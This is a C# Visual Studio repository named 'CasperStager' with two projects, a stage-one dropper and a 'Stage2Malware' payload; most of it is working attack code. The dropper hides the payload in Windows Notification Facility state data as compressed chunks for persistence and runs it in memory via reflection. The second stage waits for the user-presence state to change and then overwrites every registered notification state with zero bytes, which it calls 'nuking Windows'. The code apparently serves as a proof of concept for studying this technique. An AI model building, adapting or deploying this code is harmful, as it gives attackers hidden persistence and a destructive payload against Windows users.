├── Stage1Dropper ├── App.config ├── Properties │ └── AssemblyInfo.cs ├── Stage1Dropper.csproj └── Program.cs ├── Stage2Malware ├── App.config ├── Properties │ └── AssemblyInfo.cs ├── Stage2Malware.csproj └── Program.cs ├── CasperStager.sln └── .gitignore /Stage1Dropper/App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Stage2Malware/App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Stage1Dropper/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("CasperStager")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("CasperStager")] 13 | [assembly: AssemblyCopyright("Copyright © 2018")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("c653a9f2-0939-43c8-9b93-fed5e2e4c7e6")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /Stage2Malware/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("CasperMalware")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("CasperMalware")] 13 | [assembly: AssemblyCopyright("Copyright © 2018")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("48dfc55e-6ae5-4a36-abef-14bc09d7510b")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /CasperStager.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.28010.2026 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Stage1Dropper", "Stage1Dropper\Stage1Dropper.csproj", "{C653A9F2-0939-43C8-9B93-FED5E2E4C7E6}" 7 | EndProject 8 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Stage2Malware", "Stage2Malware\Stage2Malware.csproj", "{48DFC55E-6AE5-4A36-ABEF-14BC09D7510B}" 9 | EndProject 10 | Global 11 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 12 | Debug|Any CPU = Debug|Any CPU 13 | Release|Any CPU = Release|Any CPU 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {C653A9F2-0939-43C8-9B93-FED5E2E4C7E6}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 17 | {C653A9F2-0939-43C8-9B93-FED5E2E4C7E6}.Debug|Any CPU.Build.0 = Debug|Any CPU 18 | {C653A9F2-0939-43C8-9B93-FED5E2E4C7E6}.Release|Any CPU.ActiveCfg = Release|Any CPU 19 | {C653A9F2-0939-43C8-9B93-FED5E2E4C7E6}.Release|Any CPU.Build.0 = Release|Any CPU 20 | {48DFC55E-6AE5-4A36-ABEF-14BC09D7510B}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 21 | {48DFC55E-6AE5-4A36-ABEF-14BC09D7510B}.Debug|Any CPU.Build.0 = Debug|Any CPU 22 | {48DFC55E-6AE5-4A36-ABEF-14BC09D7510B}.Release|Any CPU.ActiveCfg = Release|Any CPU 23 | {48DFC55E-6AE5-4A36-ABEF-14BC09D7510B}.Release|Any CPU.Build.0 = Release|Any CPU 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {4B15F2D2-7724-4169-9D84-4EB2C2A5D865} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /Stage1Dropper/Stage1Dropper.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {C653A9F2-0939-43C8-9B93-FED5E2E4C7E6} 8 | Exe 9 | Stage1Dropper 10 | Stage1Dropper 11 | v4.6.1 12 | 512 13 | true 14 | true 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | 26 | 27 | AnyCPU 28 | pdbonly 29 | true 30 | bin\Release\ 31 | TRACE 32 | prompt 33 | 4 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | -------------------------------------------------------------------------------- /Stage2Malware/Stage2Malware.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {48DFC55E-6AE5-4A36-ABEF-14BC09D7510B} 8 | Exe 9 | Stage2Malware 10 | Stage2Malware 11 | v4.6.1 12 | 512 13 | true 14 | true 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | 26 | 27 | AnyCPU 28 | pdbonly 29 | true 30 | bin\Release\ 31 | TRACE 32 | prompt 33 | 4 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | 4 | # User-specific files 5 | *.suo 6 | *.user 7 | *.userosscache 8 | *.sln.docstates 9 | 10 | # User-specific files (MonoDevelop/Xamarin Studio) 11 | *.userprefs 12 | 13 | # Build results 14 | [Dd]ebug/ 15 | [Dd]ebugPublic/ 16 | [Rr]elease/ 17 | [Rr]eleases/ 18 | x64/ 19 | x86/ 20 | bld/ 21 | [Bb]in/ 22 | [Oo]bj/ 23 | [Ll]og/ 24 | 25 | # Visual Studio 2015 cache/options directory 26 | .vs/ 27 | # Uncomment if you have tasks that create the project's static files in wwwroot 28 | #wwwroot/ 29 | 30 | # MSTest test Results 31 | [Tt]est[Rr]esult*/ 32 | [Bb]uild[Ll]og.* 33 | 34 | # NUNIT 35 | *.VisualState.xml 36 | TestResult.xml 37 | 38 | # Build Results of an ATL Project 39 | [Dd]ebugPS/ 40 | [Rr]eleasePS/ 41 | dlldata.c 42 | 43 | # DNX 44 | project.lock.json 45 | project.fragment.lock.json 46 | artifacts/ 47 | 48 | *_i.c 49 | *_p.c 50 | *_i.h 51 | *.ilk 52 | *.meta 53 | *.obj 54 | *.pch 55 | *.pdb 56 | *.pgc 57 | *.pgd 58 | *.rsp 59 | *.sbr 60 | *.tlb 61 | *.tli 62 | *.tlh 63 | *.tmp 64 | *.tmp_proj 65 | *.log 66 | *.vspscc 67 | *.vssscc 68 | .builds 69 | *.pidb 70 | *.svclog 71 | *.scc 72 | 73 | # Chutzpah Test files 74 | _Chutzpah* 75 | 76 | # Visual C++ cache files 77 | ipch/ 78 | *.aps 79 | *.ncb 80 | *.opendb 81 | *.opensdf 82 | *.sdf 83 | *.cachefile 84 | *.VC.db 85 | *.VC.VC.opendb 86 | 87 | # Visual Studio profiler 88 | *.psess 89 | *.vsp 90 | *.vspx 91 | *.sap 92 | 93 | # TFS 2012 Local Workspace 94 | $tf/ 95 | 96 | # Guidance Automation Toolkit 97 | *.gpState 98 | 99 | # ReSharper is a .NET coding add-in 100 | _ReSharper*/ 101 | *.[Rr]e[Ss]harper 102 | *.DotSettings.user 103 | 104 | # JustCode is a .NET coding add-in 105 | .JustCode 106 | 107 | # TeamCity is a build add-in 108 | _TeamCity* 109 | 110 | # DotCover is a Code Coverage Tool 111 | *.dotCover 112 | 113 | # NCrunch 114 | _NCrunch_* 115 | .*crunch*.local.xml 116 | nCrunchTemp_* 117 | 118 | # MightyMoose 119 | *.mm.* 120 | AutoTest.Net/ 121 | 122 | # Web workbench (sass) 123 | .sass-cache/ 124 | 125 | # Installshield output folder 126 | [Ee]xpress/ 127 | 128 | # DocProject is a documentation generator add-in 129 | DocProject/buildhelp/ 130 | DocProject/Help/*.HxT 131 | DocProject/Help/*.HxC 132 | DocProject/Help/*.hhc 133 | DocProject/Help/*.hhk 134 | DocProject/Help/*.hhp 135 | DocProject/Help/Html2 136 | DocProject/Help/html 137 | 138 | # Click-Once directory 139 | publish/ 140 | 141 | # Publish Web Output 142 | *.[Pp]ublish.xml 143 | *.azurePubxml 144 | # TODO: Comment the next line if you want to checkin your web deploy settings 145 | # but database connection strings (with potential passwords) will be unencrypted 146 | #*.pubxml 147 | *.publishproj 148 | 149 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 150 | # checkin your Azure Web App publish settings, but sensitive information contained 151 | # in these scripts will be unencrypted 152 | PublishScripts/ 153 | 154 | # NuGet Packages 155 | *.nupkg 156 | # The packages folder can be ignored because of Package Restore 157 | **/packages/* 158 | # except build/, which is used as an MSBuild target. 159 | !**/packages/build/ 160 | # Uncomment if necessary however generally it will be regenerated when needed 161 | #!**/packages/repositories.config 162 | # NuGet v3's project.json files produces more ignoreable files 163 | *.nuget.props 164 | *.nuget.targets 165 | 166 | # Microsoft Azure Build Output 167 | csx/ 168 | *.build.csdef 169 | 170 | # Microsoft Azure Emulator 171 | ecf/ 172 | rcf/ 173 | 174 | # Windows Store app package directories and files 175 | AppPackages/ 176 | BundleArtifacts/ 177 | Package.StoreAssociation.xml 178 | _pkginfo.txt 179 | 180 | # Visual Studio cache files 181 | # files ending in .cache can be ignored 182 | *.[Cc]ache 183 | # but keep track of directories ending in .cache 184 | !*.[Cc]ache/ 185 | 186 | # Others 187 | ClientBin/ 188 | ~$* 189 | *~ 190 | *.dbmdl 191 | *.dbproj.schemaview 192 | *.jfm 193 | *.pfx 194 | *.publishsettings 195 | node_modules/ 196 | orleans.codegen.cs 197 | 198 | # Since there are multiple workflows, uncomment next line to ignore bower_components 199 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 200 | #bower_components/ 201 | 202 | # RIA/Silverlight projects 203 | Generated_Code/ 204 | 205 | # Backup & report files from converting an old project file 206 | # to a newer Visual Studio version. Backup files are not needed, 207 | # because we have git ;-) 208 | _UpgradeReport_Files/ 209 | Backup*/ 210 | UpgradeLog*.XML 211 | UpgradeLog*.htm 212 | 213 | # SQL Server files 214 | *.mdf 215 | *.ldf 216 | 217 | # Business Intelligence projects 218 | *.rdl.data 219 | *.bim.layout 220 | *.bim_*.settings 221 | 222 | # Microsoft Fakes 223 | FakesAssemblies/ 224 | 225 | # GhostDoc plugin setting file 226 | *.GhostDoc.xml 227 | 228 | # Node.js Tools for Visual Studio 229 | .ntvs_analysis.dat 230 | 231 | # Visual Studio 6 build log 232 | *.plg 233 | 234 | # Visual Studio 6 workspace options file 235 | *.opt 236 | 237 | # Visual Studio LightSwitch build output 238 | **/*.HTMLClient/GeneratedArtifacts 239 | **/*.DesktopClient/GeneratedArtifacts 240 | **/*.DesktopClient/ModelManifest.xml 241 | **/*.Server/GeneratedArtifacts 242 | **/*.Server/ModelManifest.xml 243 | _Pvt_Extensions 244 | 245 | # Paket dependency manager 246 | .paket/paket.exe 247 | paket-files/ 248 | 249 | # FAKE - F# Make 250 | .fake/ 251 | 252 | # JetBrains Rider 253 | .idea/ 254 | *.sln.iml 255 | 256 | # CodeRush 257 | .cr/ 258 | 259 | # Python Tools for Visual Studio (PTVS) 260 | __pycache__/ 261 | *.pyc -------------------------------------------------------------------------------- /Stage2Malware/Program.cs: -------------------------------------------------------------------------------- 1 | using Microsoft.Win32; 2 | using System; 3 | using System.Runtime.InteropServices; 4 | using System.Text; 5 | using System.Threading; 6 | 7 | namespace Stage2Malware 8 | { 9 | class Program 10 | { 11 | public const ulong WNF_SEB_USER_PRESENT = 0x41840B3EA3BC6875; 12 | 13 | static void Main() 14 | { 15 | IntPtr e_subscription; 16 | var e = QueryWnf(WNF_SEB_USER_PRESENT); 17 | 18 | Log("Subscribing to 0x41840B3EA3BC6875 via Windows Kernel for user-presence changes"); 19 | 20 | var s_e = RtlSubscribeWnfStateChangeNotification( 21 | out e_subscription, 22 | WNF_SEB_USER_PRESENT, 23 | e.Changestamp, 24 | new CallBackDelegate(SubscribeWnf), 25 | 0, 0, 0, 0 26 | ); 27 | 28 | while (true) { Thread.Sleep(500); } 29 | } 30 | 31 | public static void Log(string message) 32 | { 33 | Console.WriteLine(string.Format("[MALWARE] {0}", message)); 34 | } 35 | 36 | public static WnfStateData QueryWnf(ulong state) 37 | { 38 | var data = new WnfStateData(); 39 | int tries = 10; 40 | int size = 4096; 41 | while (tries-- > 0) 42 | { 43 | using (var buffer = new SafeHGlobalBuffer(size)) 44 | { 45 | int status; 46 | status = ZwQueryWnfStateData(ref state, null, IntPtr.Zero, out int changestamp, buffer, ref size); 47 | 48 | if (status == 0xC0000023) 49 | continue; 50 | data = new WnfStateData(changestamp, buffer.ReadBytes(size)); 51 | } 52 | } 53 | return data; 54 | } 55 | 56 | public static int UpdateWnf(ulong state, byte[] data) 57 | { 58 | using (var buffer = data.ToBuffer()) 59 | { 60 | ulong state_name = state; 61 | 62 | return ZwUpdateWnfStateData(ref state_name, buffer, 63 | buffer.Length, null, IntPtr.Zero, 0, false); 64 | } 65 | } 66 | 67 | [StructLayout(LayoutKind.Sequential)] 68 | public class WnfType 69 | { 70 | public Guid TypeId; 71 | } 72 | 73 | public class WnfStateData 74 | { 75 | public int Changestamp { get; } 76 | public byte[] Data { get; } 77 | 78 | public WnfStateData() { } 79 | public WnfStateData(int changestamp, byte[] data) 80 | { 81 | Changestamp = changestamp; 82 | Data = data; 83 | } 84 | } 85 | 86 | [DllImport("ntdll.dll")] 87 | public static extern int ZwQueryWnfStateData( 88 | ref ulong StateId, 89 | [In, Optional] WnfType TypeId, 90 | [Optional] IntPtr Scope, 91 | out int Changestamp, 92 | SafeBuffer DataBuffer, 93 | ref int DataBufferSize 94 | ); 95 | 96 | [DllImport("ntdll.dll")] 97 | public static extern int ZwUpdateWnfStateData( 98 | ref ulong StateId, 99 | SafeBuffer DataBuffer, 100 | int DataBufferSize, 101 | [In, Optional] WnfType TypeId, 102 | [Optional] IntPtr Scope, 103 | int MatchingChangestamp, 104 | [MarshalAs(UnmanagedType.Bool)] bool CheckChangestamp 105 | ); 106 | 107 | public class SafeHGlobalBuffer : SafeBuffer 108 | { 109 | public SafeHGlobalBuffer(int length) 110 | : this(length, length) { } 111 | 112 | protected SafeHGlobalBuffer(int allocation_length, int total_length) 113 | : this(Marshal.AllocHGlobal(allocation_length), total_length, true) { } 114 | 115 | public SafeHGlobalBuffer(IntPtr buffer, int length, bool owns_handle) 116 | : base(owns_handle) 117 | { 118 | Length = length; 119 | Initialize((ulong)length); 120 | SetHandle(buffer); 121 | } 122 | 123 | public static SafeHGlobalBuffer Null { get { return new SafeHGlobalBuffer(IntPtr.Zero, 0, false); } } 124 | 125 | protected override bool ReleaseHandle() 126 | { 127 | if (!IsInvalid) 128 | { 129 | Marshal.FreeHGlobal(handle); 130 | handle = IntPtr.Zero; 131 | } 132 | return true; 133 | } 134 | 135 | public byte[] ReadBytes(ulong byte_offset, int count) 136 | { 137 | byte[] ret = new byte[count]; 138 | ReadArray(byte_offset, ret, 0, count); 139 | return ret; 140 | } 141 | 142 | public byte[] ReadBytes(int count) 143 | { 144 | return ReadBytes(0, count); 145 | } 146 | 147 | public SafeHGlobalBuffer(byte[] data) : this(data.Length) 148 | { 149 | Marshal.Copy(data, 0, handle, data.Length); 150 | } 151 | 152 | public int Length 153 | { 154 | get; private set; 155 | } 156 | } 157 | 158 | [ComVisible(true)] 159 | public delegate void ContextCallback(object state); 160 | 161 | [DllImport("ntdll.dll")] 162 | public static extern int RtlSubscribeWnfStateChangeNotification( 163 | out IntPtr Subscription, 164 | ulong StateId, 165 | int Changestamp, 166 | CallBackDelegate Callback, 167 | [Out, Optional] int CallbackContext, 168 | [In, Optional] int TypeId, 169 | [In, Optional] int SerializationGroup, 170 | [In, Optional] int Undetermined 171 | ); 172 | 173 | public delegate int CallBackDelegate(ulong p1, IntPtr p2, IntPtr p3, IntPtr p4, [MarshalAs(UnmanagedType.LPWStr)] string p5, int p6); 174 | 175 | public static int SubscribeWnf( 176 | ulong p1, 177 | IntPtr p2, 178 | IntPtr p3, 179 | IntPtr p4, 180 | [MarshalAs(UnmanagedType.LPWStr)] string p5, 181 | int p6 182 | ) 183 | { 184 | Log("Windows Kernel executed callback delegate!"); 185 | 186 | if(p1 == WNF_SEB_USER_PRESENT) 187 | { 188 | var data = Encoding.UTF8.GetBytes(p5)[0]; 189 | switch (data) 190 | { 191 | case 1: 192 | Log(string.Format("Sleep has been triggered: {0}", data)); 193 | Log("Waiting to trigger 0-byte writes via Windows Kernel"); 194 | break; 195 | case 3: 196 | Log(string.Format("Awake has been triggered: {0}", data)); 197 | Log("Nuking Windows from user-land via 0-byte writes!"); 198 | 199 | RegistryKey key = Registry.LocalMachine.OpenSubKey(@"System\CurrentControlSet\Control\Notifications"); 200 | var states = key.GetValueNames(); 201 | foreach (var state in states) 202 | { 203 | ulong state_hex = ulong.Parse(state, System.Globalization.NumberStyles.HexNumber); 204 | UpdateWnf(state_hex, new byte[1] { 0x00 }); 205 | } 206 | break; 207 | default: 208 | break; 209 | } 210 | } 211 | return 0x00000000; 212 | } 213 | } 214 | 215 | static class BufferUtils 216 | { 217 | public static Program.SafeHGlobalBuffer ToBuffer(this byte[] value) 218 | { 219 | return new Program.SafeHGlobalBuffer(value); 220 | } 221 | } 222 | } 223 | -------------------------------------------------------------------------------- /Stage1Dropper/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Diagnostics; 4 | using System.IO; 5 | using System.IO.Compression; 6 | using System.Reflection; 7 | using System.Runtime.InteropServices; 8 | using System.Threading; 9 | 10 | namespace Stage1Dropper 11 | { 12 | class Program 13 | { 14 | public const ulong PART_1 = 0x19890C35A3BEF075; 15 | public const ulong PART_2 = 0x19890C35A3BC6075; 16 | public const ulong PART_3 = 0x19890C35A3BEC075; 17 | public const ulong WNF_XBOX_STORAGE_CHANGED = 0x19890C35A3BD6875; 18 | 19 | static void Main(string[] args) 20 | { 21 | var casper = new byte[0]; 22 | 23 | Log("Querying Windows Kernel for malware persistence at 0x19890C35A3BD6875"); 24 | 25 | if (QueryWnf(WNF_XBOX_STORAGE_CHANGED).Data.Length > 0) 26 | { 27 | Log("Found malware at 0x19890C35A3BEF075!"); 28 | Log("Decompressing payload from 0x19890C35A3BEF075, 0x19890C35A3BC6075, and 0x19890C35A3BC6875"); 29 | 30 | var p1_compressed = QueryWnf(PART_1).Data; 31 | var p2_compressed = QueryWnf(PART_2).Data; 32 | var p3_compressed = QueryWnf(PART_3).Data; 33 | 34 | var part1 = Decompress(p1_compressed); 35 | var part2 = Decompress(p2_compressed); 36 | var part3 = Decompress(p3_compressed); 37 | 38 | var s = new MemoryStream(); 39 | s.Write(part1, 0, part1.Length); 40 | s.Write(part2, 0, part2.Length); 41 | s.Write(part3, 0, part3.Length); 42 | casper = s.ToArray(); 43 | } 44 | else 45 | { 46 | Log("Malware NOT found persisting!"); 47 | Log("Fetching malware using domain fronting ..."); 48 | /// TODO: Fetch from web 49 | casper = File.ReadAllBytes(@".\Stage2Malware.exe"); 50 | 51 | Log("Publishing malware via Windows Kernel to 0x19890C35A3BEF075, 0x19890C35A3BC6075, and 0x19890C35A3BC6875"); 52 | 53 | var chunksize = casper.Length / 3; 54 | var part1 = new MemoryStream(); 55 | var part2 = new MemoryStream(); 56 | var part3 = new MemoryStream(); 57 | 58 | part1.Write(casper, 0, chunksize); 59 | part2.Write(casper, chunksize, chunksize); 60 | part3.Write(casper, chunksize*2, chunksize); 61 | 62 | var p1_compressed = Compress(part1.ToArray()); 63 | var p2_compressed = Compress(part2.ToArray()); 64 | var p3_compressed = Compress(part3.ToArray()); 65 | 66 | if( 67 | (p1_compressed.Length > 4096) || 68 | (p2_compressed.Length > 4096) || 69 | (p3_compressed.Length > 4096) 70 | ) 71 | { 72 | Log("Persisting malware error, size too large!"); 73 | Environment.Exit(0); 74 | } 75 | 76 | var s1 = UpdateWnf(PART_1, p1_compressed); 77 | var s2 = UpdateWnf(PART_2, p2_compressed); 78 | var s3 = UpdateWnf(PART_3, p3_compressed); 79 | 80 | Log("Updating persistence check via Windows Kernel to 0x19890C35A3BD6875 ..."); 81 | UpdateWnf(WNF_XBOX_STORAGE_CHANGED, new byte[1] { 0x1 }); 82 | } 83 | 84 | Log("Injecting and executing malware using System.Reflection"); 85 | 86 | //UpdateWnf(WNF_XBOX_STORAGE_CHANGED, new byte[0] { }); 87 | 88 | RunStager(casper); 89 | 90 | while (true) { Thread.Sleep(500); } 91 | } 92 | 93 | public static void Log(string message) 94 | { 95 | Console.WriteLine(string.Format("[DROPPER] {0}", message)); 96 | } 97 | 98 | public static void RunStager(byte[] payload) 99 | { 100 | MethodInfo target = Assembly.Load(payload).EntryPoint; 101 | target.Invoke(null, null); 102 | } 103 | 104 | public static byte[] Compress(byte[] data) 105 | { 106 | MemoryStream output = new MemoryStream(); 107 | using (DeflateStream dstream = new DeflateStream(output, CompressionLevel.Optimal)) 108 | { 109 | dstream.Write(data, 0, data.Length); 110 | } 111 | return output.ToArray(); 112 | } 113 | 114 | public static byte[] Decompress(byte[] data) 115 | { 116 | MemoryStream input = new MemoryStream(data); 117 | MemoryStream output = new MemoryStream(); 118 | using (DeflateStream dstream = new DeflateStream(input, CompressionMode.Decompress)) 119 | { 120 | dstream.CopyTo(output); 121 | } 122 | return output.ToArray(); 123 | } 124 | 125 | public static int UpdateWnf(ulong state, byte[] data) 126 | { 127 | using (var buffer = data.ToBuffer()) 128 | { 129 | ulong state_name = state; 130 | 131 | return ZwUpdateWnfStateData(ref state_name, buffer, 132 | buffer.Length, null, IntPtr.Zero, 0, false); 133 | } 134 | } 135 | 136 | public static WnfStateData QueryWnf(ulong state) 137 | { 138 | var data = new WnfStateData(); 139 | int tries = 10; 140 | int size = 4096; 141 | while (tries-- > 0) 142 | { 143 | using (var buffer = new SafeHGlobalBuffer(size)) 144 | { 145 | int status; 146 | status = ZwQueryWnfStateData(ref state, null, IntPtr.Zero, out int changestamp, buffer, ref size); 147 | 148 | if (status == 0xC0000023) 149 | continue; 150 | data = new WnfStateData(changestamp, buffer.ReadBytes(size)); 151 | } 152 | } 153 | return data; 154 | } 155 | 156 | [StructLayout(LayoutKind.Sequential)] 157 | public class WnfType 158 | { 159 | public Guid TypeId; 160 | } 161 | 162 | public class WnfStateData 163 | { 164 | public int Changestamp { get; } 165 | public byte[] Data { get; } 166 | 167 | public WnfStateData() { } 168 | public WnfStateData(int changestamp, byte[] data) 169 | { 170 | Changestamp = changestamp; 171 | Data = data; 172 | } 173 | } 174 | 175 | [DllImport("ntdll.dll")] 176 | public static extern int ZwQueryWnfStateData( 177 | ref ulong StateId, 178 | [In, Optional] WnfType TypeId, 179 | [Optional] IntPtr Scope, 180 | out int Changestamp, 181 | SafeBuffer DataBuffer, 182 | ref int DataBufferSize 183 | ); 184 | 185 | 186 | [DllImport("ntdll.dll")] 187 | public static extern int ZwUpdateWnfStateData( 188 | ref ulong StateId, 189 | SafeBuffer DataBuffer, 190 | int DataBufferSize, 191 | [In, Optional] WnfType TypeId, 192 | [Optional] IntPtr Scope, 193 | int MatchingChangestamp, 194 | [MarshalAs(UnmanagedType.Bool)] bool CheckChangestamp 195 | ); 196 | 197 | // Original dev: James Forshaw @tyranid: Project Zero 198 | // Ref: https://github.com/googleprojectzero/sandbox-attacksurface-analysis-tools/blob/46b95cba8f76fae9a5c8258d13057d5edfacdf90/NtApiDotNet/SafeHandles.cs 199 | public class SafeHGlobalBuffer : SafeBuffer 200 | { 201 | public SafeHGlobalBuffer(int length) 202 | : this(length, length) { } 203 | 204 | protected SafeHGlobalBuffer(int allocation_length, int total_length) 205 | : this(Marshal.AllocHGlobal(allocation_length), total_length, true) { } 206 | 207 | public SafeHGlobalBuffer(IntPtr buffer, int length, bool owns_handle) 208 | : base(owns_handle) 209 | { 210 | Length = length; 211 | Initialize((ulong)length); 212 | SetHandle(buffer); 213 | } 214 | 215 | 216 | public static SafeHGlobalBuffer Null { get { return new SafeHGlobalBuffer(IntPtr.Zero, 0, false); } } 217 | 218 | protected override bool ReleaseHandle() 219 | { 220 | if (!IsInvalid) 221 | { 222 | Marshal.FreeHGlobal(handle); 223 | handle = IntPtr.Zero; 224 | } 225 | return true; 226 | } 227 | 228 | public byte[] ReadBytes(ulong byte_offset, int count) 229 | { 230 | byte[] ret = new byte[count]; 231 | ReadArray(byte_offset, ret, 0, count); 232 | return ret; 233 | } 234 | 235 | public byte[] ReadBytes(int count) 236 | { 237 | return ReadBytes(0, count); 238 | } 239 | 240 | public SafeHGlobalBuffer(byte[] data) : this(data.Length) 241 | { 242 | Marshal.Copy(data, 0, handle, data.Length); 243 | } 244 | 245 | public int Length 246 | { 247 | get; private set; 248 | } 249 | } 250 | } 251 | 252 | static class BufferUtils 253 | { 254 | public static Program.SafeHGlobalBuffer ToBuffer(this byte[] value) 255 | { 256 | return new Program.SafeHGlobalBuffer(value); 257 | } 258 | } 259 | } 260 | --------------------------------------------------------------------------------